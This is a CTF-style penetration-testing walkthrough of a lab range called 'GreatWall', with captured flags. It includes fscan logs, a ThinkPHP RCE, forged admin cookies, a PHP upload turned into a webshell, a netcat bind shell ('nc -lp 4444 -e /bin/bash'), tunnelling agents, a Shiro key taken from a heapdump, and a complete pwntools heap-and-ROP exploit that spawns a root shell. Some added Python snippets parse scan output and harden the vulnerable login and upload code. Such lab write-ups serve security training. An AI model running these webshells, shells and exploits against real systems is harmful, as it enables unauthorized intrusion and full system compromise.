GreatWall

In this range you play a penetration-testing engineer hired to assess the network security posture of "SmartLink Technologies Ltd.". Your task is first to compromise the company's application services exposed to the public Internet, then use post-exploitation techniques to move deeper into SmartLink's internal network. Along the way you look for weaknesses and vulnerabilities and take over every service one by one until you control the entire internal network. Six flags are placed on different hosts in the range; finding and capturing them is the objective.

1. flag 01

┌──(root㉿kali)-[~]
└─# fscan -h 39.101.70.161
      Fscan Version: 2.0.1

[798ms]     已选择服务扫描模式
[798ms]     开始信息扫描
[798ms]     最终有效主机数量: 1
[798ms]     开始主机扫描
[798ms]     使用服务插件: activemq, cassandra, elasticsearch, findnet, ftp, imap, kafka, ldap, memcached, modbus, mongodb, ms17010, mssql, mysql, neo4j, netbios, oracle, pop3, postgres, rabbitmq, rdp, redis, rsync, smb, smb2, smbghost, smtp, snmp, ssh, telnet, vnc, webpoc, webtitle
[798ms]     有效端口数量: 233
[857ms] [*] 端口开放 39.101.70.161:22
[869ms] [*] 端口开放 39.101.70.161:8080
[872ms] [*] 端口开放 39.101.70.161:80
[3.8s]     扫描完成, 发现 3 个开放端口
[3.8s]     存活端口数量: 3
[3.8s]     开始漏洞扫描
[3.8s]     POC加载完成: 总共387个,成功387个,失败0个
[3.9s] [*] 网站标题 http://39.101.70.161      状态码:200 长度:10887  标题:""
[5.2s] [*] 网站标题 http://39.101.70.161:8080 状态码:200 长度:1027   标题:Login Form
[9.8s] [+] 目标: http://39.101.70.161:8080
  漏洞类型: poc-yaml-thinkphp5023-method-rce
  漏洞名称: poc1
  详细信息:
        参考链接:https://github.com/vulhub/vulhub/tree/master/thinkphp/5.0.23-rce

1.1. ThinkPHP/5.0.23-rce

Pasted image 20260121133657.png

/var/www/html/background/public/ >cat /f1ag01_UdEv.txt

flag01: flag{176f49b6-147f-4557-99ec-ba0a351e1ada}
/var/www/html/background/public/ >ip a

1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:16:3e:12:c4:00 brd ff:ff:ff:ff:ff:ff
    inet 172.28.23.17/16 brd 172.28.255.255 scope global dynamic eth0
       valid_lft 1892159641sec preferred_lft 1892159641sec
    inet6 fe80::216:3eff:fe12:c400/64 scope link 
       valid_lft forever preferred_lft forever

1.2. Internal network scan

www-data@portal:/tmp$ ./fscan -h 172.28.23.17/24                                                                                
[1.8s]     当前用户权限不足,无法发送ICMP包
[1.8s]     切换为PING方式探测...
[2.8s] [*] 目标 172.28.23.17    存活 (ICMP)
[4.8s] [*] 目标 172.28.23.26    存活 (ICMP)
[4.8s] [*] 目标 172.28.23.33    存活 (ICMP)
[7.8s]     存活主机数量: 3
[7.8s]     有效端口数量: 233
[7.8s] [*] 端口开放 172.28.23.17:80
[7.8s] [*] 端口开放 172.28.23.33:22
[7.8s] [*] 端口开放 172.28.23.17:8080
[7.8s] [*] 端口开放 172.28.23.17:22
[7.8s] [*] 端口开放 172.28.23.26:21
[7.8s] [*] 端口开放 172.28.23.26:80
[7.8s] [*] 端口开放 172.28.23.33:8080
[7.8s] [*] 端口开放 172.28.23.26:22
[7.8s]     扫描完成, 发现 8 个开放端口
[7.8s]     存活端口数量: 8
[7.8s]     开始漏洞扫描
[8.0s] [*] 网站标题 http://172.28.23.17       状态码:200 长度:10887  标题:""
[8.0s]     POC加载完成: 总共387个,成功387个,失败0个
[8.0s] [*] 网站标题 http://172.28.23.26       状态码:200 长度:13693  标题:新翔OA管理系统-OA管理平台联系电话:13849422648微信同号,QQ958756413
[8.2s] [+] FTP服务 172.28.23.26:21 匿名登录成功!
[8.2s] [*] 网站标题 http://172.28.23.17:8080  状态码:200 长度:1027   标题:Login Form
[8.3s] [*] 网站标题 http://172.28.23.33:8080  状态码:302 长度:0      标题:无标题 重定向地址: http://172.28.23.33:8080/login;jsessionid=8D16C89D74D2C22DDC40A4F87D27C134
[8.7s] [*] 网站标题 http://172.28.23.33:8080/login;jsessionid=8D16C89D74D2C22DDC40A4F87D27C134 状态码:200 长度:3860   标题:智联科技 ERP 后台登陆
[8.9s] [+] 目标: http://172.28.23.17:8080
  漏洞类型: poc-yaml-thinkphp5023-method-rce
  漏洞名称: poc1
  详细信息:
        参考链接:https://github.com/vulhub/vulhub/tree/master/thinkphp/5.0.23-rce
[9.9s] [+] 目标: http://172.28.23.33:8080
  漏洞类型: poc-yaml-springboot-env-unauth
  漏洞名称: spring2
  详细信息:
        参考链接:https://github.com/LandGrey/SpringBootVulExploit
[46.6s]     扫描已完成: 12/12
IP: 172.28.23.17 (current foothold, www-data)
Port: 22, Service: SSH
Port: 80, Service: HTTP
Port: 8080, Service: ThinkPHP, Vulnerability: ThinkPHP 5.0.23 Method RCE

IP: 172.28.23.26
Port: 21, Service: FTP, Vulnerability: FTP anonymous login succeeded
Port: 22, Service: SSH
Port: 80, Service: 新翔OA管理系统 (OA management system)

IP: 172.28.23.33
Port: 22, Service: SSH
Port: 8080, Service: SpringBoot / 智联科技 ERP, Vulnerability: SpringBoot Env unauthenticated access
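The per-host summary above is just a restructuring of the fscan console output. The following is an added example (not part of this writeup and not fscan's own code): a small Python parser that turns fscan 2.0.1 lines into an inventory and renders it in the same summary style, which is handy for feeding scan results into a ticket or asset list. The sample input is a trimmed copy of the lines shown above, the well-known port names are an assumed lookup, and the function names are my own.

```python
import re
from collections import defaultdict

# Constructed sample input: a trimmed copy of fscan 2.0.1 lines as they appear in this writeup.
SAMPLE = """\
[7.8s] [*] 端口开放 172.28.23.17:80
[7.8s] [*] 端口开放 172.28.23.33:22
[7.8s] [*] 端口开放 172.28.23.17:8080
[7.8s] [*] 端口开放 172.28.23.17:22
[7.8s] [*] 端口开放 172.28.23.26:21
[7.8s] [*] 端口开放 172.28.23.33:8080
[8.0s] [*] 网站标题 http://172.28.23.17       状态码:200 长度:10887  标题:""
[8.2s] [+] FTP服务 172.28.23.26:21 匿名登录成功!
[8.3s] [*] 网站标题 http://172.28.23.33:8080  状态码:302 长度:0      标题:无标题 重定向地址: http://172.28.23.33:8080/login
[8.9s] [+] 目标: http://172.28.23.17:8080
  漏洞类型: poc-yaml-thinkphp5023-method-rce
  漏洞名称: poc1
[9.9s] [+] 目标: http://172.28.23.33:8080
  漏洞类型: poc-yaml-springboot-env-unauth
  漏洞名称: spring2
"""

# Assumed names for well-known ports; fscan itself only labels what a plugin confirms.
WELL_KNOWN = {21: "FTP", 22: "SSH", 80: "HTTP", 443: "HTTPS", 3306: "MySQL", 8080: "HTTP"}

IP = r"(\d{1,3}(?:\.\d{1,3}){3})"
PORT_RE = re.compile(r"端口开放 " + IP + r":(\d+)")
TITLE_RE = re.compile(r"网站标题 (https?)://" + IP + r"(?::(\d+))?\S*\s+状态码:(\d+)\s+长度:\d+\s+标题:(.*)$")
FTP_RE = re.compile(r"FTP服务 " + IP + r":(\d+) 匿名登录成功")
TARGET_RE = re.compile(r"\[\+\] 目标: https?://" + IP + r"(?::(\d+))?")
POC_RE = re.compile(r"^\s*漏洞类型: (\S+)")


def parse_fscan(text):
    """Return {ip: {"ports": {port: service}, "vulns": [str, ...]}} from fscan console output."""
    hosts = defaultdict(lambda: {"ports": {}, "vulns": []})
    pending = None  # (ip, port) from the last "[+] 目标:" line, waiting for its 漏洞类型 line
    for line in text.splitlines():
        m = PORT_RE.search(line)
        if m:
            port = int(m.group(2))
            hosts[m.group(1)]["ports"].setdefault(port, WELL_KNOWN.get(port, "unknown"))
            continue
        m = TITLE_RE.search(line)
        if m:
            scheme, ip, port, status, title = m.groups()
            port = int(port) if port else (443 if scheme == "https" else 80)
            hosts[ip]["ports"][port] = f"{scheme.upper()} {status}: {title.strip()}"
            continue
        m = FTP_RE.search(line)
        if m:
            hosts[m.group(1)]["vulns"].append(f"{m.group(2)}/tcp: FTP anonymous login")
            continue
        m = TARGET_RE.search(line)
        if m:
            pending = (m.group(1), m.group(2) or "80")
            continue
        m = POC_RE.match(line)
        if m and pending:
            ip, port = pending
            hosts[ip]["vulns"].append(f"{port}/tcp: {m.group(1)}")
            pending = None
    return dict(hosts)


def render(inventory):
    """Render the inventory in the per-host summary style used in this writeup."""
    out = []
    for ip in sorted(inventory, key=lambda a: tuple(int(x) for x in a.split("."))):
        out.append(f"IP: {ip}")
        for port, svc in sorted(inventory[ip]["ports"].items()):
            out.append(f"Port: {port}, Service: {svc}")
        for v in inventory[ip]["vulns"]:
            out.append(f"Vulnerability: {v}")
        out.append("")
    return "\n".join(out).rstrip("\n")


if __name__ == "__main__":
    print(render(parse_fscan(SAMPLE)))
```

The POC hit spans two lines (`[+] 目标:` followed by `漏洞类型:`), so the parser keeps the last target as pending state until the vulnerability type line arrives.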

1.3. Internal network proxy

www-data@portal:/tmp$ ./ligolo_agent -bind 0.0.0.0:20000 -ignore-cert
WARN[0000] TLS Certificate fingerprint is: C1F578B028FC9673A3AB6EE1C270427C33EF4C2F1B6A35AFFBA4D72BB64B728A 
INFO[0000] Listening on 0.0.0.0:20000...                
INFO[0066] Got connection from: 183.228.210.110:17798   
INFO[0066] Connection established                        addr="183.228.210.110:17798"

ligolo-ng » connect_agent --ip 39.101.70.161:20000
? TLS Certificate Fingerprint is: C1F578B028FC9673A3AB6EE1C270427C33EF4C2F1B6A35AFFBA4D72BB64B728A, connect? Yes
INFO[0051] Agent connected.                              id=00163e12c400 name=www-data@portal remote="39.101.70.161:20000"
ligolo-ng » interface_create --name gwall
INFO[0079] Creating a new gwall interface...
INFO[0079] Interface created!
ligolo-ng » session
? Specify a session : 1 - www-data@portal - 39.101.70.161:20000 - 00163e12c400
[Agent : www-data@portal] » tunnel_start --tun gwall
INFO[0093] Starting tunnel to www-data@portal (00163e12c400)
[Agent : www-data@portal] » ifconfig
┌────────────────────────────────────┐
│ Interface 0                        │
├──────────────┬─────────────────────┤
│ Name         │ lo                  │
│ Hardware MAC │                     │
│ MTU          │ 65536               │
│ Flags        │ up|loopback|running │
│ IPv4 Address │ 127.0.0.1/8         │
│ IPv6 Address │ ::1/128             │
└──────────────┴─────────────────────┘
┌───────────────────────────────────────────────┐
│ Interface 1                                   │
├──────────────┬────────────────────────────────┤
│ Name         │ eth0                           │
│ Hardware MAC │ 00:16:3e:12:c4:00              │
│ MTU          │ 1500                           │
│ Flags        │ up|broadcast|multicast|running │
│ IPv4 Address │ 172.28.23.17/16                │
│ IPv6 Address │ fe80::216:3eff:fe12:c400/64    │
└──────────────┴────────────────────────────────┘
[Agent : www-data@portal] » interface_add_route --name gwall --route 172.28.23.17/24
INFO[0151] Route created.
[Agent : www-data@portal] » 

2. flag 02 172.28.23.26

IP: 172.28.23.26
Port: 21, Service: FTP, Vulnerability: FTP anonymous login succeeded
Port: 22, Service: SSH
Port: 80, Service: 新翔OA管理系统 (OA management system)

2.1. FTP anonymous login

┌──(root㉿kali)-[~/Desktop/ChunQiu/Greatwall]
└─# ftp 172.28.23.26
Connected to 172.28.23.26.
220 (vsFTPd 3.0.3)
Name (172.28.23.26:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||10678|)
150 Here comes the directory listing.
-rw-r--r--    1 0        0         7536672 Mar 23  2024 OASystem.zip
226 Directory send OK.
ftp> get OASystem.zip
local: OASystem.zip remote: OASystem.zip
229 Entering Extended Passive Mode (|||37229|)
150 Opening BINARY mode data connection for OASystem.zip (7536672 bytes).
100% |**************************************************************************************|  7360 KiB    1.33 MiB/s    00:00 ETA
226 Transfer complete.
7536672 bytes received in 00:05 (1.33 MiB/s)
ftp>

Audit the site source code; I just fed the whole thing to an AI.

<?php
function islogin(){
    if(isset($_COOKIE['id'])&&isset($_COOKIE['loginname'])&&isset($_COOKIE['jueseid'])&&isset($_COOKIE['danweiid'])&&isset($_COOKIE['quanxian'])){
        if($_COOKIE['id']!=''&&$_COOKIE['loginname']!=''&&$_COOKIE['jueseid']!=''&&$_COOKIE['danweiid']!=''&&$_COOKIE['quanxian']!=''){
            return true;
        }
        else {
            return false;
        }
    }
    else {
        return false;
    }
}
?>
GET /main.php HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: id=1; loginname=admin; jueseid=1; danweiid=1; quanxian=admin
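The islogin() function above never verifies anything: it only checks that five cookies exist and are non-empty, and the role (quanxian) is read straight from the client, so the request with `quanxian=admin` is accepted as an administrator. As an added example (not code from the writeup or from the OA product), here is a Python port of that check beside a hardened variant in which the server issues an HMAC-SHA256 signed session token and derives the role from its own user table. The SECRET, USERS table, token layout and function names are all my assumptions.

```python
import base64
import hashlib
import hmac
import json
import time

# The five cookies the PHP islogin() looks at.
REQUIRED_COOKIES = ("id", "loginname", "jueseid", "danweiid", "quanxian")


def islogin_vulnerable(cookies):
    """Faithful port of the OA islogin(): true if all five cookies exist and are non-empty."""
    return all(cookies.get(name, "") != "" for name in REQUIRED_COOKIES)


# --- hardened variant (assumptions: a server-side secret and a user table) ---
SECRET = b"constructed-demo-secret-do-not-reuse"  # would be loaded from config, never sent to clients
USERS = {  # constructed user table; the role is looked up here, not read from a cookie
    "admin": {"id": 1, "jueseid": 1, "danweiid": 1, "quanxian": "admin"},
    "alice": {"id": 2, "jueseid": 3, "danweiid": 2, "quanxian": "user"},
}


def _b64e(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def _b64d(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def issue_session(loginname, now=None, ttl=3600):
    """Create a token the server can verify later: b64(payload).b64(HMAC-SHA256(payload))."""
    if loginname not in USERS:
        raise KeyError(loginname)
    now = time.time() if now is None else now
    payload = json.dumps({"sub": loginname, "exp": int(now + ttl)}, separators=(",", ":")).encode()
    tag = hmac.new(SECRET, payload, hashlib.sha256).digest()
    return _b64e(payload) + "." + _b64e(tag)


def verify_session(token, now=None):
    """Return the server-side user record for a valid, unexpired token, else None."""
    now = time.time() if now is None else now
    try:
        p64, t64 = token.split(".", 1)
        payload, tag = _b64d(p64), _b64d(t64)
        claims = json.loads(payload)
    except (ValueError, TypeError):  # malformed base64 / JSON / missing separator
        return None
    expected = hmac.new(SECRET, payload, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):  # constant-time comparison
        return None
    if not isinstance(claims, dict) or claims.get("exp", 0) <= now:
        return None
    user = USERS.get(claims.get("sub"))
    if user is None:
        return None
    return {"loginname": claims["sub"], **user}


def islogin_hardened(cookies, now=None):
    """Only a valid signed session cookie counts; the role never comes from the client."""
    return verify_session(cookies.get("session", ""), now) is not None
```

The forged cookie set from the request above passes the vulnerable check and fails the hardened one; editing the signed payload (for example changing `sub` to `admin`) invalidates the HMAC, and the expiry is enforced server-side.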

/uploadbase64.php

<?php
/**
 * Description: PhpStorm.
 * Author: yoby
 * DateTime: 2018/12/4 18:01
 * Email:logove@qq.com
 * Copyright Yoby版权所有
 */
$img = $_POST['imgbase64'];
if (preg_match('/^(data:\s*image\/(\w+);base64,)/', $img, $result)) {
    $type = ".".$result[2];
    $path = "upload/" . date("Y-m-d") . "-" . uniqid() . $type;
}
$img =  base64_decode(str_replace($result[1], '', $img));
@file_put_contents($path, $img);
exit('{"src":"'.$path.'"}');
POST /uploadbase64.php HTTP/1.1
Host: 172.28.23.26
Cookie: id=1; loginname=admin; jueseid=1; danweiid=1; quanxian=admin
Content-Type: application/x-www-form-urlencoded
Content-Length: 60
Connection: close

imgbase64=


HTTP/1.1 200 OK
Date: Wed, 21 Jan 2026 06:37:56 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Length: 45
Connection: close
Content-Type: text/html; charset=UTF-8

{"src":"upload/2026-01-21-6970744429a68.php"}
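uploadbase64.php derives the file extension from the `image/<type>` part of the data URI and writes the decoded body under upload/ with that extension, which is why a `data:image/php;base64,` prefix yields the `.php` file in the response above (and if the prefix does not match at all, `$path` is never set). The following is an added example, not code from the OA product: a Python port of the vulnerable naming rule beside a hardened decoder that allowlists image types, checks the magic bytes against the declared type and picks the file name itself. The allowlist, size limit and function names are assumptions.

```python
import base64
import binascii
import hashlib
import re

DATA_URI = re.compile(r"^(data:\s*image/(\w+);base64,)")


def vulnerable_target_path(img):
    """Port of uploadbase64.php's naming: the extension is whatever follows image/ in the data URI."""
    m = DATA_URI.match(img)
    if not m:
        return None
    return "upload/constructed-name." + m.group(2)  # "constructed-name" stands in for date + uniqid()


ALLOWED_TYPES = {  # extension -> leading magic bytes (assumed policy: raster images only)
    "png": b"\x89PNG\r\n\x1a\n",
    "jpeg": b"\xff\xd8\xff",
    "jpg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}
MAX_BYTES = 2 * 1024 * 1024  # assumed upload limit


class UploadRejected(ValueError):
    pass


def hardened_decode(img):
    """Return (path, bytes) only when the declared type is allowed and the bytes match it."""
    m = DATA_URI.match(img)
    if not m:
        raise UploadRejected("not an image data URI")
    declared = m.group(2).lower()
    if declared not in ALLOWED_TYPES:
        raise UploadRejected(f"type image/{declared} is not allowed")
    try:
        body = base64.b64decode(img[m.end():], validate=True)
    except (binascii.Error, ValueError):
        raise UploadRejected("malformed base64")
    if len(body) > MAX_BYTES:
        raise UploadRejected("too large")
    if not body.startswith(ALLOWED_TYPES[declared]):
        raise UploadRejected("content does not match declared image type")
    ext = "jpg" if declared == "jpeg" else declared
    # Server-chosen name: a content hash, so the client controls neither name nor extension.
    return f"upload/{hashlib.sha256(body).hexdigest()[:32]}.{ext}", body


def rejects(img):
    """Helper: True if the hardened decoder refuses this upload."""
    try:
        hardened_decode(img)
    except UploadRejected:
        return True
    return False
```

Even with this check in place, the upload directory should be served with script execution disabled, so that a file which slips through is still never run as PHP.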


2.2. Bypass disable_functions

POST /uploadbase64.php HTTP/1.1
Host: 172.28.23.26
Cookie: id=1; loginname=admin; jueseid=1; danweiid=1; quanxian=admin
Content-Type: application/x-www-form-urlencoded
Content-Length: 72
Connection: close

imgbase64=

HTTP/1.1 200 OK
Date: Wed, 21 Jan 2026 06:42:50 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Length: 45
Connection: close
Content-Type: text/html; charset=UTF-8

{"src":"upload/2026-01-21-6970756a83fcf.php"}

Upload the webshell, then connect to it with AntSword (蚁剑).

After clicking Start, a .antproxy.php file is uploaded; create a shell.php in the same directory.

#/var/www/html/OAsystem/upload/shell.php
<?php system($_GET['cmd']);?>


Edit .antproxy.php so that its URL points at our shell.php.

From now on, requesting .antproxy.php is equivalent to requesting shell.php.

GET http://172.28.23.26/upload/.antproxy.php?cmd=whoami HTTP/1.1
Host: 172.28.23.26
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Cookie: id=1; loginname=admin; jueseid=1; danweiid=1; quanxian=admin
Connection: close


This is the GET-request backdoor.

GET http://172.28.23.26/upload/.antproxy.php?cmd=chmod+%2bx+/tmp/stowaway_agent
GET http://172.28.23.26/upload/.antproxy.php?cmd=/tmp/stowaway_agent+-l+4444
nc -lp 4444 -e /bin/bash
[*] Trying to connect node actively
    .-')    .-') _                  ('\ .-') /'  ('-.      ('\ .-') /'  ('-.
   ( OO ). (  OO) )                  '.( OO ),' ( OO ).-.   '.( OO ),' ( OO ).-.
   (_)---\_)/     '._  .-'),-----. ,--./  .--.   / . --. /,--./  .--.   / . --. /  ,--.   ,--.
   /    _ | |'--...__)( OO'  .-.  '|      |  |   | \-.  \ |      |  |   | \-.  \    \  '.'  /
   \  :' '. '--.  .--'/   |  | |  ||  |   |  |,.-'-'  |  ||  |   |  |,.-'-'  |  | .-')     /
    '..'''.)   |  |   \_) |  |\|  ||  |.'.|  |_)\| |_.'  ||  |.'.|  |_)\| |_.'  |(OO  \   /
   .-._)   \   |  |     \ |  | |  ||         |   |  .-.  ||         |   |  .-.  | |   /  /\_
   \       /   |  |      ''  '-'  '|   ,'.   |   |  | |  ||   ,'.   |   |  | |  | '-./  /.__)
    '-----'    '--'        '-----' '--'   '--'   '--' '--''--'   '--'   '--' '--'   '--'
                                    { v2.2  Author:ph4ntom }
[*] Waiting for new connection...
[*] Connect to node 172.28.23.26:4444 successfully! Node id is 0
(admin) >>


www-data@ubuntu-oa:/var/www/html/OAsystem/upload$ find / -perm -4000 2>/dev/null
/bin/fusermount
/bin/ping6
/bin/mount
/bin/su
/bin/ping
/bin/umount
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/at
/usr/bin/staprun
/usr/bin/base32
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/sudo
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/s-nail/s-nail-privsep

www-data@ubuntu-oa:/var/www/html/OAsystem/upload$ base32 /flag02.txt |base32 -d
flag02: flag{56d37734-5f73-447f-b1a5-a83f45549b28}
www-data@ubuntu-oa:/var/www/html/OAsystem/upload$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:16:3e:12:c4:7d brd ff:ff:ff:ff:ff:ff
    inet 172.28.23.26/16 brd 172.28.255.255 scope global eth0
       valid_lft forever preferred_lft forever
    inet6 fe80::216:3eff:fe12:c47d/64 scope link
       valid_lft forever preferred_lft forever
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:16:3e:12:c3:cc brd ff:ff:ff:ff:ff:ff
    inet 172.22.14.6/16 brd 172.22.255.255 scope global eth1
       valid_lft forever preferred_lft forever
    inet6 fe80::216:3eff:fe12:c3cc/64 scope link
       valid_lft forever preferred_lft forever

3. flag03 172.28.23.33

IP: 172.28.23.33
Port: 22, Service: SSH
Port: 8080, Service: SpringBoot / 智联科技 ERP, Vulnerability: SpringBoot Env unauthenticated access, heapdump

3.1. SpringBoot heapdump & Shiro deserialization

┌──(root㉿kali)-[~/Desktop/ChunQiu/Greatwall]
└─# dirsearch -u http://172.28.23.33:8080/ -x 403,404

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /root/Desktop/ChunQiu/Greatwall/reports/http_172.28.23.33_8080/__26-01-21_02-13-52.txt

Target: http://172.28.23.33:8080/

[02:13:52] Starting: 
[02:13:56] 400 -  435B  - /\..\..\..\..\..\..\..\..\..\etc\passwd
[02:13:56] 400 -  435B  - /a%5c.aspx
[02:13:57] 200 -    2KB - /actuator
[02:13:57] 200 -   20B  - /actuator/caches
[02:13:57] 200 -   99KB - /actuator/conditions
[02:13:57] 200 -    7KB - /actuator/env
[02:13:57] 200 -   91KB - /actuator/beans
[02:13:57] 200 -  167B  - /actuator/health
[02:13:57] 200 -   54B  - /actuator/scheduledtasks
[02:13:57] 200 -    2B  - /actuator/info
[02:13:57] 200 -   50KB - /actuator/loggers
[02:13:57] 200 - 1018B  - /actuator/metrics
[02:13:57] 200 -   14KB - /actuator/configprops
[02:13:57] 200 -   22KB - /actuator/mappings
[02:13:57] 200 -   82KB - /actuator/threaddump
[02:13:58] 200 -   29MB - /actuator/heapdump
[02:14:12] 200 -    4KB - /login
[02:14:12] 200 -    4KB - /login/

Task Completed
┌──(root㉿kali)-[~/Desktop/ChunQiu/Greatwall]
└─# JDumpSpider-1.1-SNAPSHOT-full.jar heapdump
===========================================

===========================================
CookieRememberMeManager(ShiroKey)
-------------
algMode = GCM, key = AZYyIgMYhG6/CzIJlvpR2g==, algName = AES

===========================================

ops01@ubuntu-erp:/tmp$ netstat -lnpt
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:59696           0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp6       0      0 :::8080                 :::*                    LISTEN      672/java

ops01@ubuntu-erp:/tmp$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:16:3e:12:c4:58 brd ff:ff:ff:ff:ff:ff
    inet 172.28.23.33/16 brd 172.28.255.255 scope global dynamic eth0
       valid_lft 1892152714sec preferred_lft 1892152714sec
    inet6 fe80::216:3eff:fe12:c458/64 scope link
       valid_lft forever preferred_lft forever
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:16:3e:12:c4:79 brd ff:ff:ff:ff:ff:ff
    inet 172.22.10.16/24 brd 172.22.10.255 scope global eth1
       valid_lft forever preferred_lft forever
    inet6 fe80::216:3eff:fe12:c479/64 scope link
       valid_lft forever preferred_lft forever
# exp.py
from pwn import *
context.arch = 'amd64'

def add(key, data=b'b'):
    p.sendlineafter(b'Option:', b'1')
    p.sendlineafter(b'Key:', key)
    p.sendlineafter(b'Data:', data)

def show(key):
    p.sendlineafter(b'Option:', b'2')
    p.sendlineafter(b"Key: ", key)

def edit(key, data):
    p.sendlineafter(b'Option:', b'3')
    p.sendlineafter(b'Key:', key)
    p.sendlineafter(b'Data:', data)

def name(username):
    p.sendlineafter(b'Option:', b'4')
    p.sendlineafter(b'name:', username)

# connect to the target
p = remote('172.28.23.33', 59696)
# p = process('./HashNote')

username = 0x5dc980
stack = 0x5e4fa8
ukey = b'\x30'*5 + b'\x31' + b'\x44'

# build the first fake_chunk, used to leak an address
fake_chunk = flat({
    0: username + 0x10,
    0x10: [username + 0x20, len(ukey), ukey, 0],
    0x30: [stack, 0x10]
}, filler=b'\x00')

p.sendlineafter(b'name', fake_chunk)
p.sendlineafter(b'word', b'freep@ssw0rd:3')

add(b'\x30'*1 + b'\x31' + b'\x44', b'test') # 126
add(b'\x30'*2 + b'\x31' + b'\x44', b'test') # 127

# leak the stack / return address
show(ukey)
main_ret = u64(p.read(8)) - 0x1e0

# ROP gadget definitions
rdi = 0x0000000000405e7c # pop rdi ; ret
rsi = 0x000000000040974f # pop rsi ; ret
rdx = 0x000000000053514b # pop rdx ; pop rbx ; ret
rax = 0x00000000004206ba # pop rax ; ret
syscall = 0x00000000004560c6 # syscall

# build the second fake_chunk, pointing the edit target at the return address
fake_chunk = flat({
    0: username + 0x20,
    0x20: [username + 0x30, len(ukey), ukey, 0],
    0x40: [main_ret, 0x100, b'/bin/sh\x00']
}, filler=b'\x00')

name(fake_chunk.ljust(0x80, b'\x00'))

# build the ROP chain: execve("/bin/sh", 0, 0)
payload = flat([
    rdi, username + 0x50,
    rsi, 0,
    rdx, 0, 0,
    rax, 0x3b,
    syscall
])

p.sendlineafter(b'Option:', b'3')
p.sendlineafter(b'Key:', ukey)
p.sendline(payload)

# trigger the return and run the ROP chain
p.sendlineafter(b'Option:', b'9')
p.interactive()
┌──(root㉿kali)-[~/Desktop/ChunQiu/Greatwall]
└─# python exp.py
[+] Opening connection to 172.28.23.33 on port 59696: Done
/root/Desktop/ChunQiu/Greatwall/exp.py:38: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  p.sendlineafter(b'word', 'freep@ssw0rd:3')
[*] Switching to interactive mode
 Invalid!$ whoami
root
$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:16:3e:12:c4:58 brd ff:ff:ff:ff:ff:ff
    inet 172.28.23.33/16 brd 172.28.255.255 scope global dynamic eth0
       valid_lft 1892152373sec preferred_lft 1892152373sec
    inet6 fe80::216:3eff:fe12:c458/64 scope link
       valid_lft forever preferred_lft forever
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:16:3e:12:c4:79 brd ff:ff:ff:ff:ff:ff
    inet 172.22.10.16/24 brd 172.22.10.255 scope global eth1
       valid_lft forever preferred_lft forever
